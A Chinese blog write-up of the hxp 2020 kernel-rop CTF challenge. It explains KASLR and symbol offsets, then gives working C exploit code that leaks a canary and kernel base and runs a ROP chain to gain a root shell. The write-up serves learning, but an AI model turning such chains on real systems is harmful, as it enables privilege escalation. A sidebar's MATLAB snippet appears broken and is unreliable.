0006-TIPS-2020-hxp-kernel-rop : bypass-KASLR-with-offset_leak

已于 2023-06-19 01:52:09 修改
阅读量462 收藏
点赞数
分类专栏: pwn_cve_kernel 文章标签: kernel pwn
于 2023-06-19 01:52:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u014679440/article/details/131256285
版权

内核默认加载地址(不开启KASLR)

kernel text mapping

在内核linux-5.9/Documentation/x86/x86_64/mm.rst文档中记录了 x86_64虚拟地址空间布局
其中0xffffffff80000000~0xffffffff9fffffff用于存放内核代码段全局变量BSS

   ffffffff80000000 |   -2    GB | ffffffff9fffffff |  512 MB | kernel text mapping, mapped to physical address 0

该区域的起始地址,在内核中使用__START_KERNEL_map宏来表示

// linux-5.9/arch/x86/include/asm/page_64_types.h
#define __START_KERNEL_map	_AC(0xffffffff80000000, UL)

同时,mm.rst文档中也描述该区域会被映射到物理地址0处

__START_KERNEL宏 和 __PHYSICAL_START宏

__PHYSICAL_START宏是内核代码段在物理内存中的起始地址
__START_KERNEL宏是是内核代码段映射的起始虚拟地址

// include/generated/autoconf.h
#define CONFIG_PHYSICAL_START 0x1000000
#define CONFIG_PHYSICAL_ALIGN 0x200000

// arch/x86/include/asm/page_types.h
#define __PHYSICAL_START	ALIGN(CONFIG_PHYSICAL_START, \
				      CONFIG_PHYSICAL_ALIGN)
				      
#define __START_KERNEL		(__START_KERNEL_map + __PHYSICAL_START)

可以看出
__PHYSICAL_START宏 的默认值是 0x1000000
__START_KERNEL宏 的默认值是 0xffffffff81000000

内核.text 和 startup_64

内核代码段起始位置存储的startup_64函数的代码

// arch/x86/kernel/head_64.S
	.text
	__HEAD
	.code64
SYM_CODE_START_NOALIGN(startup_64)
	UNWIND_HINT_EMPTY
	leaq	(__end_init_task - SIZEOF_PTREGS)(%rip), %rsp
	call verify_cpu
	leaq	_text(%rip), %rdi
	pushq	%rsi
	call	__startup_64
	[...]

在未开启KASLR的内核中查看函数符号的地址

/ # cat /proc/kallsyms | grep "startup_64"
ffffffff81000000 T startup_64    # <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
ffffffff81000030 T secondary_startup_64
ffffffff810001f0 T __startup_64
/ # cat /proc/kallsyms | grep "_text"
ffffffff81000000 T _text		# <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

可以看到_textstartup_64的地址都是0xffffffff81000000,而startup_64的地址又被称为内核基地址

内核符号到内核基地址的偏移

首先在当前题目中,不开启KASLR,查看多个符号

/ # cat /proc/kallsyms | grep "startup_64"
ffffffff81000000 T startup_64				# <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
ffffffff81000030 T secondary_startup_64
ffffffff810001f0 T __startup_64
/ # cat /proc/kallsyms | grep "prepare_kernel_cred"
ffffffff814c67f0 T prepare_kernel_cred		# <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
ffffffff81f8d4fc r __ksymtab_prepare_kernel_cred
ffffffff81fa09b2 r __kstrtab_prepare_kernel_cred
ffffffff81fa4d42 r __kstrtabns_prepare_kernel_cred
/ # cat /proc/kallsyms | grep "commit_creds"
ffffffff814c6410 T commit_creds				# <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
ffffffff81f87d90 r __ksymtab_commit_creds
ffffffff81fa0972 r __kstrtab_commit_creds
ffffffff81fa4d42 r __kstrtabns_commit_creds

prepare_kernel_credstartup_64的偏移是 0x4c67f0
commit_credsstartup_64的偏移是 4c6410

还是在当前题目中,开启KASLR,查看多个符号

/ # cat /proc/kallsyms | grep "startup_64"
ffffffff86000000 T startup_64				# <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
ffffffff86000030 T secondary_startup_64
ffffffff860001f0 T __startup_64
/ # cat /proc/kallsyms | grep "prepare_kernel_cred"
ffffffff864c67f0 T prepare_kernel_cred		# <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
ffffffff86f8d4fc r __ksymtab_prepare_kernel_cred
ffffffff86fa09b2 r __kstrtab_prepare_kernel_cred
ffffffff86fa4d42 r __kstrtabns_prepare_kernel_cred
/ # cat /proc/kallsyms | grep "commit_creds"
ffffffff864c6410 T commit_creds				# <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
ffffffff86f87d90 r __ksymtab_commit_creds
ffffffff86fa0972 r __kstrtab_commit_creds
ffffffff86fa4d42 r __kstrtabns_commit_creds

prepare_kernel_credstartup_64的偏移是 0x4c67f0
commit_credsstartup_64的偏移是 4c6410
可以看到无论是否开启KASLR(现在不关心FSGASLR),对于同一个内核环境,各个内核符号到内核基地址的偏移时不变的,也就是说,只要获取了任意一个符号的真实地址,就可以通过偏移量计算处所有符号的地址

KASLR 内核地址随机化流程

内核配置选项中CONFIG_RANDOMIZE_BASE,就打开了KASLR功能;当然在内核启动过程中会检查启动命令参数中是否包含nokaslr,如果存在,地址随机化功能也是关闭的
主要逻辑如下

// arch/arm64/kernel/kaslr.c
/*
 * Since this function examines addresses much more numerically,
 * it takes the input and output pointers as 'unsigned long'.
 */
void choose_random_location(unsigned long input,
			    unsigned long input_size,
			    unsigned long *output,
			    unsigned long output_size,
			    unsigned long *virt_addr)
{
	unsigned long random_addr, min_addr;

	if (cmdline_find_option_bool("nokaslr")) {
		warn("KASLR disabled: 'nokaslr' on cmdline.");
		return;
	}

#ifdef CONFIG_X86_5LEVEL
	if (__read_cr4() & X86_CR4_LA57) {
		__pgtable_l5_enabled = 1;
		pgdir_shift = 48;
		ptrs_per_p4d = 512;
	}
#endif

	boot_params->hdr.loadflags |= KASLR_FLAG;

	/* Prepare to add new identity pagetables on demand. */
	initialize_identity_maps();

	/* Record the various known unsafe memory ranges. */
	mem_avoid_init(input, input_size, *output);

	/*
	 * Low end of the randomization range should be the
	 * smaller of 512M or the initial kernel image
	 * location:
	 */
	min_addr = min(*output, 512UL << 20);

	/* Walk available memory entries to find a random address. */
	random_addr = find_random_phys_addr(min_addr, output_size);
	if (!random_addr) {
		warn("Physical KASLR disabled: no suitable memory region!");
	} else {
		/* Update the new physical address location. */
		if (*output != random_addr) {
			add_identity_map(random_addr, output_size);
			*output = random_addr;
		}

		/*
		 * This loads the identity mapping page table.
		 * This should only be done if a new physical address
		 * is found for the kernel, otherwise we should keep
		 * the old page table to make it be like the "nokaslr"
		 * case.
		 */
		finalize_identity_maps();
	}


	/* Pick random virtual address starting from LOAD_PHYSICAL_ADDR. */
	if (IS_ENABLED(CONFIG_X86_64))
		random_addr = find_random_virt_addr(LOAD_PHYSICAL_ADDR, output_size);
	*virt_addr = random_addr;
}
  • 检查是否在命令行中设置了 “nokaslr” 参数:
    • 如果在命令行中设置了 “nokaslr” 参数,则禁用 KASLR(内核地址空间布局随机化)并返回。
    • 否则,继续执行后续的 KASLR 相关操作。
  • 针对支持 5 级页表(CONFIG_X86_5LEVEL)的系统进行处理:
    • 如果启用了 5 级页表,设置相关变量,包括 __pgtable_l5_enabled、pgdir_shift 和 ptrs_per_p4d。
  • 将 KASLR_FLAG 标志添加到引导参数(boot_params->hdr.loadflags)中,表示启用 KASLR。
  • 初始化身份映射(identity maps):
    • 在需要时准备添加新的身份映射页表。
  • 记录已知的不安全内存范围:
  • 调用 mem_avoid_init 函数,传递输入内存范围和输出内存范围,用于记录已知的不安全内存范围。
  • 确定随机化范围的最低地址(min_addr):
    • min_addr 的值是输出地址和 512MB 中较小的一个。
  • 通过遍历可用内存条目,找到一个随机的物理地址:
    • 调用 find_random_phys_addr 函数,在最低地址(min_addr)和输出内存范围大小(output_size)之间查找一个随机的物理地址。
    • 如果未找到适合的内存区域,则打印警告消息并禁用物理 KASLR。
    • 否则,更新输出地址为找到的随机地址,并添加身份映射。
  • 最终化身份映射:
    • 调用 finalize_identity_maps 函数,加载新的身份映射页表。
  • 选择随机的虚拟地址:
    • 如果启用了 64 位(CONFIG_X86_64),调用 find_random_virt_addr 函数,在 LOAD_PHYSICAL_ADDR 和输出内存范围大小之间查找一个随机的虚拟地址。
    • 将找到的随机虚拟地址赋值给 virt_addr。
      通过这些步骤,choose_random_location 函数实现了 KASLR 的关键逻辑,包括选择随机的物理地址和虚拟地址,并更新对应的输出参数。

题目解

启用kaslr(内核地址随机化),但是禁用 fgkaslr

#!/bin/sh
qemu-system-x86_64 \
    -m 1024M \
    -cpu kvm64,+smep,+smap \
    -kernel vmlinuz \
    -initrd initramfs.cpio.gz \
    -hdb flag.txt \
    -snapshot \
    -nographic \
    -monitor /dev/null \
    -no-reboot \
    -append "console=ttyS0 nofgkaslr quiet panic=1"

由于该题目只是栈溢出,只能在读取栈上的内容,看看能不能读到什么特别的东西(没有特别的技巧)

多输出一些栈中的内容,观察是否有可用的点

#include <fcntl.h>  // open()
#include <stdbool.h>
#include <stdint.h> // uint8_t | uint64_t
#include <stdio.h>
#include <stdlib.h> // exit()
#include <string.h>
#include <unistd.h>

char *VULN_DRV = "/dev/hackme";

int64_t global_fd = 0;
uint64_t cookie = 0;
uint8_t cookie_off = 16;


void open_dev() {
    global_fd = open(VULN_DRV, O_RDWR);
    if (global_fd < 0) {
        printf("[-] failed to open %s\n", VULN_DRV);
        exit(-1);
    } else {
        printf("[+] successfully opened %s\n", VULN_DRV);
    }
}


void leak_cookie() {
    uint8_t sz = 40;
    uint64_t leak[sz];
    printf("[*] trying to leak up to %ld bytes memory\n", sizeof(leak));
    uint64_t data = read(global_fd, leak, sizeof(leak));
    cookie = leak[cookie_off];
    for (int i = 0; i < 40; i++)
        printf("[*] leaking #%d: 0x%lx\n", i, leak[i]);
    printf("[+] found stack canary: 0x%lx @ index %d\n", cookie, cookie_off);
	if(!cookie) {
    	puts("[-] failed to leak stack canary!");
    	exit(-1);
    }
}


int main(int argc, char **argv) {
    open_dev();
    leak_cookie();

    return 0;
}

在这里插入图片描述

发现在内核栈中,#38处的内容与内核基地址的有着固定的差值
只要 leak[38] & 0xffffffffffff0000的结果就能获取到开启KASLR后的内核基地址,再通过这个内核基地址加上各符号的偏移就能获取各符号的实际地址

/*
...
[*] leaking #37: 0xffffbfbb801bff48
[*] leaking #38: 0xffffffffa0e0a157
[*] leaking #39: 0x0
...
TODO 获取溢出的内容,这些内容里面可能包含函数指针,通过这些函数指针,可以计算出内核基地址

在泄露的数据中,我们可以看到索引为38的整数与内核基地址相似,如果我们将该整数的最低0xffff归零,
我们将获得内核基地址:
*/


#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>

char *VULN_DRV = "/dev/hackme";
void spawn_shell();

int64_t global_fd = 0;
uint64_t cookie = 0;
uint8_t cookie_off = 16;
int64_t kernel_base_offset = 0;
uint64_t kernel_base = 0xffffffff81000000;

uint64_t user_cs, user_ss, user_rflags, user_sp;
uint64_t user_rip = (uint64_t) spawn_shell;
uint64_t prepare_kernel_cred = 0xffffffff814c67f0;
uint64_t commit_creds = 0xffffffff814c6410;
uint64_t pop_rdi_ret = 0xffffffff81006370;
uint64_t mov_rdi_rax_clobber_rsi140_pop1_ret = 0xffffffff816bf203;
uint64_t swapgs_restore_regs_and_return_to_usermode = 0xffffffff81200f10;


void open_dev() {
    global_fd = open(VULN_DRV, O_RDWR);
    if (global_fd < 0) {
        printf("[!] failed to open %s\n", VULN_DRV);
        exit(-1);
    } else {
        printf("[+] successfully opened %s\n", VULN_DRV);
    }
}


void leak_cookie_and_kernel_offset() {
    uint8_t sz = 40;
    uint64_t leak[sz];
    printf("[*] trying to leak up to %ld bytes memory\n", sizeof(leak));
    uint64_t data = read(global_fd, leak, sizeof(leak));
    cookie = leak[cookie_off];
    kernel_base_offset = (leak[38] & 0xffffffffffff0000) - kernel_base;
    printf("[+] got kernel base address offset: 0x%lx\n", kernel_base_offset);
    printf("[+] found stack canary: 0x%lx @ index %d\n", cookie, cookie_off);
	if(!cookie) {
    	puts("[-] failed to leak stack canary!");
    	exit(-1);
    }
}


void spawn_shell() {
    puts("[+] returned to user land");
    uid_t uid = getuid();
    if (uid == 0) {
        printf("[+] got root (uid = %d)\n", uid);
    } else {
        printf("[!] failed to get root (uid: %d)\n", uid);
        exit(-1);
    }
    puts("[*] spawning shell");
    system("/bin/sh");
    exit(0);
}


void save_userland_state() {
    puts("[*] saving user land state");
    __asm__(".intel_syntax noprefix;"
            "mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"
            "pop user_rflags;"
            ".att_syntax");
}


void overwrite_ret() {
    puts("[*] trying to run ROP chain and bypass KASLR with kernel offset leak");
    uint8_t sz = 35;
    uint64_t payload[sz];

    payload[cookie_off++] = cookie;
    payload[cookie_off++] = 0x0;
    payload[cookie_off++] = 0x0;
    payload[cookie_off++] = 0x0;
    payload[cookie_off++] = pop_rdi_ret + kernel_base_offset; // return address
    payload[cookie_off++] = 0x0;
    payload[cookie_off++] = prepare_kernel_cred + kernel_base_offset;
    payload[cookie_off++] = mov_rdi_rax_clobber_rsi140_pop1_ret + kernel_base_offset;
    payload[cookie_off++] = 0x0;
    payload[cookie_off++] = commit_creds + kernel_base_offset;
    payload[cookie_off++] = swapgs_restore_regs_and_return_to_usermode + kernel_base_offset + 22;
    payload[cookie_off++] = 0x0;
    payload[cookie_off++] = 0x0;
    payload[cookie_off++] = user_rip;
    payload[cookie_off++] = user_cs;
    payload[cookie_off++] = user_rflags;
    payload[cookie_off++] = user_sp;
    payload[cookie_off++] = user_ss;

    uint64_t data = write(global_fd, payload, sizeof(payload));

    puts("[-] if you can read this we failed the mission :(");
}


int main(int argc, char **argv) {
    open_dev();
    leak_cookie_and_kernel_offset();
    save_userland_state();
    overwrite_ret();

    return 0;
}

结果

Booting from ROM..
/ $ ./06_bypass_kaslr
[+] successfully opened /dev/hackme
[*] trying to leak up to 320 bytes memory
[+] got kernel base address offset: 0x1cc00000
[+] found stack canary: 0x5c45408670922e00 @ index 16
[*] saving user land state
[*] trying to run ROP chain and bypass KASLR with kernel offset leak
[+] returned to user land
[+] got root (uid = 0)
[*] spawning shell
/ #

参考

https://www.anquanke.com/post/id/235482
https://fanlv.fun/2021/07/25/linux-mem/
https://0x434b.dev/dabbling-with-linux-kernel-exploitation-ctf-challenges-to-learn-the-ropes/#kaslr
https://blog.wohin.me/posts/linux-kernel-pwn-01/

showme#
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
0007-TIPS-2020-hxp-kernel-rop : bypass-FGKASLR-with-ksymtab_leak
blind cat
06-19 345
鉴于 KASLR 的不足,有研究者实现了 FGKASLR。FGKASLRKASLR 基地址随机化的基础上,在加载时刻,以函数粒度重新排布内核代码。
js代码方式实现生成随机虚拟地址
qq_58517459的博客
05-18 396
【代码】js代码方式实现生成随机虚拟地址。
启动VMware虚拟机显示:物理内存不足无法使用
qq_44761480的博客
09-24 1053
最简单办法 编辑->首选项->内存 看看你分配的总内存是不是小于分配给那个虚拟机的,也可以开启允许交换大部分虚拟机内存
Linux关闭KASLR
网络空间发展与战略研究
07-11 3266
0. 环境准备 Ubuntu 16.04 Desktop x86_64 Centos 7 1. 查看默认是否开启了KASLR sudo cat /proc/kallsyms > kallsyms.txt 查看kallsyms.txt文件,找到startup_64一行,如果首列值为ffffffff81000000,则基本确定KASLR关闭,否则开启 2. 修改/etc/defau...
Linux内核笔记之KASLR
热门推荐
Hober
01-20 1万+
KASLRkernel address space layout randomization,内核地址空间布局随机化,是linux内核的一个非常重要的安全机制。KASLR技术可以让kernel image映射的地址相对于链接地址有个偏移,安全性上有一定的提升。
随机地址生成器
09-26
生成城市名称,包括所在省份,市,以及区县,仅仅支持精确到区,无具体地址
0002-TIPS-2020-hxp-kernel-rop : bypass-smep-with-rop
blind cat
06-18 408
使用的开始上一节中的pwn题。
0001-TIPS-2020-hxp-kernel-rop : ret2user
06-19
0001-TIPS-2020-hxp-kernel-rop : ret2user
INS005-1-DDL_ROLLBACK.sql
12-17
INS005-1-DDL_ROLLBACK.sql
hxp-开源
04-27
用于交互通信的Healthcare Xchange协议。 数据交换/传输,平台无关,XML-RPC,HL7,SOAP,EDIFACT,简单,轻松,经过身份验证,安全,透明,无地域限制,开源,同行评审,合作开发
matlab代码步骤-band-gap-qt:带隙-qt
06-04
hxp 此程序为Qt程序,后端运算需要MATLAB R2019b。由于不同电脑MATLAB库的位置不同,编译出来的程序不能保证运行,因此只有源代码。 编译步骤 先修改band-gap-qt.pro中 INCLUDEPATH += /usr/local/Polyspace/R2019b/...
http-server:为 Haxe 项目提供 http-server
05-30
该库也可以从 HXP 而不是通过 Haxelib 运行 hxp path/to/http-server -h 开发构建 克隆 http-server 存储库: git clone https://github.com/openfl/http-server 告诉 haxelib 您的 http-server 开发副本安装在...
ucore开启虚拟存储器过程详解
weixin_44037337的博客
10-18 1125
link脚本 在本项目中,有boot.ld和kernel.ld两个链接脚本 先来放几个常用链接脚本的注解: /DISCARD/ : {*(.comment)} //将输入文件的comment段丢弃 PROVIDE//该关键字定义一个(目标文件内被引用但没定义)符号。相当于定义一个全局变量,其他C文件可以引用它。 先来看第一个 OUTPUT_FORMAT("elf32-i386") OUTPUT_ARCH(i386) /** .data * .startu
linux KASLR
weixin_41028621的博客
05-14 430
学习Linux kaslr.
国内移动端APP月活跃(MAU)Top5000 数据整理
06-16
国内移动端APP月活跃(MAU)Top5000 时间范围:2020年-2022年 具有一定参考价值 csv格式
和平巨魔跨进成免费.ipa
最新发布
06-16
和平巨魔跨进成免费.ipa
数据库管理工具:dbeaver-ce-23.0.4-macos-aarch64.dmg
06-16
1.DBeaver是一款通用数据库工具,专为开发人员和数据库管理员设计。 2.DBeaver支持多种数据库系统,包括但不限于MySQL、PostgreSQL、Oracle、DB2、MSSQL、Sybase、Mimer、HSQLDB、Derby、SQLite等,几乎涵盖了市场上所有的主流数据库。 3.支持的操作系统:包括Windows(2000/XP/2003/Vista/7/10/11)、Linux、Mac OS、Solaris、AIX、HPUX等。 4.主要特性: 数据库管理:支持数据库元数据浏览、元数据编辑(包括表、列、键、索引等)、SQL语句和脚本的执行、数据导入导出等。 用户界面:提供图形界面来查看数据库结构、执行SQL查询和脚本、浏览和导出数据,以及处理BLOB/CLOB数据等。用户界面设计简洁明了,易于使用。 高级功能:除了基本的数据库管理功能外,DBeaver还提供了一些高级功能,如数据库版本控制(可与Git、SVN等版本控制系统集成)、数据分析和可视化工具(如图表、统计信息和数据报告)、SQL代码自动补全等。
【课件】8.4.1简单选择排序.pdf
06-16
【课件】8.4.1简单选择排序
二维TE波FDTD方法引入高斯源作图,显示收敛阶matlab实现
08-27
### 回答1: 二维TE波FDTD方法的收敛性通常可以通过计算误差来验证。一种常用的方法是使用与解析解比较的误差,但是由于解析解通常难以得到,因此我们可以使用网格收敛性分析方法。 具体的,我们可以固定物理模型和计算区域大小,然后逐步减小网格大小进行模拟,并计算出每个网格大小下的误差。通常情况下,我们期望误差随着网格大小的减小而减小,且其减小速度应该接近于一个常数,即网格收敛阶。 在二维TE波FDTD方法中,我们可以引入高斯源来进行模拟,并计算出其收敛阶。下面是一个基于Matlab实现的示例代码: ```matlab % 二维TE波FDTD方法引入高斯源作图,显示收敛阶matlab实现 clc; clear; close all; %% 配置模拟参数 c0 = 3e8; % 光速 dx = 1e-3; % 网格步长 dy = dx; dt = dx/c0/sqrt(2); % 时间步长 T = 4e-9; % 计算时间 Lx = 20e-3; % 计算区域长度 Ly = Lx; x = (-Lx/2:dx:Lx/2); % 网格点坐标 y = (-Ly/2:dy:Ly/2); nx = length(x); ny = length(y); t = (0:dt:T); % 时间坐标 nt = length(t); z0 = 377; % 自由空间阻抗 eps0 = 8.854e-12; % 真空介电常数 mu0 = pi*4e-7; % 真空磁导率 epsx = ones(nx, ny)*eps0; % x方向介电常数 epsy = ones(nx, ny)*eps0; % y方向介电常数 mux = ones(nx, ny)*mu0; % x方向磁导率 muy = ones(nx, ny)*mu0; % y方向磁导率 %% 定义高斯源及其位置 x0 = 0; y0 = 0; % 高斯源位置 s = 1e-10; % 高斯源时间宽度 f = 1e9; % 高斯源中心频率 A = 1; % 高斯源幅值 t0 = 3*s; % 计算的起始时间 h = waitbar(0, '正在计算中,请稍等...'); Ez = zeros(nx, ny); for n = 1:nt waitbar(n/nt, h, sprintf('已完成 %.2f%%', n/nt*100)); % 更新Ez场 Hy = Hy - dt./muy.*diff(Ez, [], 1)/dx; Hx = Hx + dt./mux.*diff(Ez, [], 2)/dy; Ez(:, 2:end-1) = Ez(:, 2:end-1) + dt./(epsx(:, 2:end-1).*dy)./muy(:, 2:end-1).*(Hx(:, 2:end-1)-Hx(:, 1:end-2)) - ... dt./(epsy(2:end-1, :).*dx)./mux(2:end-1, :).*(Hy(2:end-1, :)-Hy(1:end-2, :)); % 更新高斯源 Ez(round(nx/2)+round(x0/dx), round(ny/2)+round(y0/dy)) = A*exp(-((n*dt-t0)/s)^2)*cos(2*pi*f*(n*dt-t0)); end %% 计算收敛阶 err = zeros(4, 1); for p = 1:4 nxp = nx*2^(p-1); nyp = ny*2^(p-1); dxp = Lx/nxp; dyp = Ly/nyp; dtp = dxp/c0/sqrt(2); x = (-Lx/2:dxp:Lx/2); y = (-Ly/2:dyp:Ly/2); Ezp = zeros(nxp, nyp); for n = 1:nt % 更新Ez场 Hyp = Hy - dtp./muy.*diff(Ezp, [], 1)/dxp; Hxp = Hx + dtp./mux.*diff(Ezp, [], 2)/dyp; Ezp(:, 2:end-1) = Ezp(:, 2:end-1) + dtp./(epsx(:, 2:end-1).*dyp)./muy(:, 2:end-1).*(Hxp(:, 2:end-1)-Hxp(:, 1:end-2)) - ... dtp./(epsy(2:end-1, :).*dxp)./mux(2:end-1, :).*(Hyp(2:end-1, :)-Hyp(1:end-2, :)); % 更新高斯源 Ezp(round(nxp/2)+round(x0/dxp), round(nyp/2)+round(y0/dyp)) = A*exp(-((n*dtp-t0)/s)^2)*cos(2*pi*f*(n*dtp-t0)); end err(p) = norm(Ez(1:2^(p-1):end, 1:2^(p-1):end)-Ezp, 'fro'); end %% 绘制误差随网格大小变化的图像 figure; loglog([1, 2, 4, 8], err, '-o'); xlabel('网格大小比例'); ylabel('误差'); grid on; p = polyfit(log([1, 2, 4, 8]), log(err), 1); fprintf('计算收敛阶为: %.2f\n', -p(1)); ``` 在上述代码中,我们首先定义了模拟参数,然后引入高斯源进行模拟,计算出Ez场。接着,我们使用不同的网格大小分别进行模拟,并计算误差。最后,我们绘制了误差随网格大小变化的图像,并使用拟合方法计算出了收敛阶。 这里我们使用了二维TE波FDTD方法,如果你需要使用其他方法进行模拟,可能需要对代码进行相应的修改。 ### 回答2: 在使用二维时域有限差分时间域方法(FDTD)时,要引入高斯源来进行计算。二维TE波源可以通过一个电磁脉冲来模拟,其中电场沿着一个方向振荡,磁场沿着垂直的方向振荡。我们可以使用Matlab来实现这个模拟,并绘制出收敛阶曲线。 首先,我们需要创建一个二维网格来表示空间中的点。我们可以选择一个合适的分辨率,然后在每个网格点上存储电场和磁场的数值。对于TE波源,我们只需要在一个位置上设置一个高斯波包。 然后,我们需要在每个时间步长上更新电磁场的数值。根据FDTD的离散方程,在每个时间步长上,我们可以使用电磁场在邻近点的数值来更新当前点的数值。这个过程可以通过一个循环来实现。 接下来,我们可以选择一些合适的观测点,计算它们上的电磁场的数值,并将其保存下来。通过将这些数值与理论解进行比较,我们可以计算出FDTD方法的收敛阶。 最后,我们可以使用Matlab中的绘图函数来绘制收敛阶的曲线。我们可以将网格分辨率作为横坐标,收敛阶作为纵坐标。在每个网格点上,我们可以计算出收敛阶,并绘制出整个曲线。 总之,通过引入高斯源并使用Matlab实现二维TE波的FDTD方法,我们可以绘制出收敛阶曲线,以评估FDTD模拟的准确度和收敛性能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值